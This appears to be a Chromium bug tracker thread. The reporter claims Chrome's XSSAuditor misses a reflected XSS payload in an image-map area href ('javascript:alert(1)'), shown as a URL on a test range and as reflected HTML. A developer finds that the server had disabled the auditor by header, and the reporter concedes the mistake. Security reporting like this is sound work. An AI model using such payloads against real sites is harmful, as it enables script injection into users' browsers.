XSSAuditor does not filter the area token. However, area.href does support JS URIs |
|||
Issue descriptionUserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36 Steps to reproduce the problem: 1. Open this link: http://iq-firingrange.appspot.com/reflected/parameter/body?q=%3Cmap%20name=%22abcdef%22%3E%3Carea%20href=%22javascript:alert(1)%22%20shape=%22rect%22%20coords=%220,0,500,500%22%3E%3C/map%3E%3Cimg%20width=500%20height=500%20%20src=%22data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAUAAAAFCAYAAACNbyblAAAAHElEQVQI12P4//8/w38GIAXDIBKE0DHxgljNBAAO9TXL0Y4OHwAAAABJRU5ErkJggg==%22%20usemap=%22%23abcdef%22%3E 2. Click the image 3. alert pops up What is the expected behavior? The area.href attribute gets removed by the XSSAuditor What went wrong? The XSSAuditor is not filtering area tags Did this work before? N/A Chrome version: 48.0.2564.97 Channel: n/a OS Version: Flash Version: Shockwave Flash 20.0 r0
,
Feb 29 2016
Just for posterity, the reflection is:
<html>
<body>
<map name="abcdef"><area href="javascript:alert(1)" shape="rect" coords="0,0,500,500"></map><img width=500 height=500 src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAUAAAAFCAYAAACNbyblAAAAHElEQVQI12P4//8/w38GIAXDIBKE0DHxgljNBAAO9TXL0Y4OHwAAAABJRU5ErkJggg==" usemap="#abcdef">
</body>
</html>
,
Feb 29 2016
,
Feb 29 2016
Your server is sending an X-XSS-Protect: 0 header. XSSAuditor catches this in my test environent. Thanks.
,
Feb 29 2016
OMG, how did I miss that. Sorry for wasting your time. |
|||
►
Sign in to add a comment |
|||
Comment 1 by tsepez@chromium.org
, Feb 29 2016Status: Assigned (was: Unconfirmed)